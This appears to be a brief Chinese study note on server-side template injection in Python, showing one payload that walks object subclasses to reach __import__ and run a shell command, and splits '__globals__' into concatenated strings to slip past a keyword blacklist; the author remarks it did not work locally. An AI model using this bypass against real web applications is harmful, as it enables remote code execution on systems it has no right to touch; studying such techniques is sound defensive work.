通过索引形式访问元素以绕过部分黑名单.md
[].__class__.__base__.__subclasses__()[58].__init__['__glo'+'bals__']['__builtins__']['__import__']('commands').getoutput('ls')
这里通过__init__['__glo'+'bals__']
代替了__init__.__globals__
,实现了对globals
黑名单的绕过
然而本地可能因为版本问题没有成功过==
#Web #python #bypass #SSTI